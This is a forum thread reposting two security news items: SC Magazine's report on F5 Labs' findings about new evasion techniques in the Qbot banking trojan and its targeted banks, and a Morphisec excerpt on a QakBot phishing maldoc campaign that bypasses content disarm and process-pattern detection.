Targeting U.S. banks, Qbot trojan evolves with new evasion techniques

[silversurfer]

Content source

https://www.scmagazine.com/home/security-news/cybercrime/targeting-u-s-banks-qbot-trojan-evolves-with-new-evasion-techniques/

By malware standards, the banking trojan Qbot is long in the tooth, but it still has some bite, according to researchers who say it has added some detection and research evasion techniques to its arsenal.

“It has a new packing layer that scrambles and hides the code from scanners and signature-based tools,” wrote Doron Voolf, malware analyst at F5 Labs (part of F5 Networks), in a recent company blog post. “It also includes anti-virtual machine techniques, which helps it resist forensic examination.”

This latest sample was programmed to harvest credentials primarily from U.S. banks and their online financial services offerings. F5 identified 36 targeted U.S. financial institutions and two banks in Canada and the Netherlands, including J.P. Morgan, Citibank, Fifth Third Bank, U.S. Bancorp, Citizens Bank, Keybank, Bank of America, Capital One, First Citizens Bancshares, First Horizon Bank, SunTrust, Compass Bank, TD Bank, Wells Fargo, Frost Bank, TCF Bank, Huntington Bancshares, M&T Bank, Scotiabank, First Merit Corporation, Eastern Bank, ABN AMRO, PNC Bank, Silicon Valley Bank and others. The researchers also found six generic URL targets “that might be added as a second stage in the fraud action.”

 

[silversurfer]

QakBot (QBot) Maldoc Campaign Introduces Two New Techniques into Its Arsenal

The QakBot malware has introduced two new techniques into its arsenal. QBot attacks typically include a malicious attachment to a phishing email.

blog.morphisec.com

Morphisec Labs has tracked a massive maldoc campaign delivering the QakBot/QBot banking trojan, starting earlier this month. Qakbot leverages advanced techniques to evade detection and hamper manual analysis of the threat. In this post we will mention two of those interesting techniques.
QakBot attacks typically include a malicious attachment to a phishing email. Often these are bare Microsoft Word documents attached to the spam email. This particular campaign features a ZIP file; within the ZIP attachment is a Word document that includes macros within the document. These macros execute a PowerShell script that then downloads the Qakbot payload from specific URLs.
This particular campaign also includes two new techniques: a bypass of the content disarm and reconstruction (CDR) technology through zipping the Word document, and a bypass of child-pattern pattern detection because Visual Basic is executed using Explorer.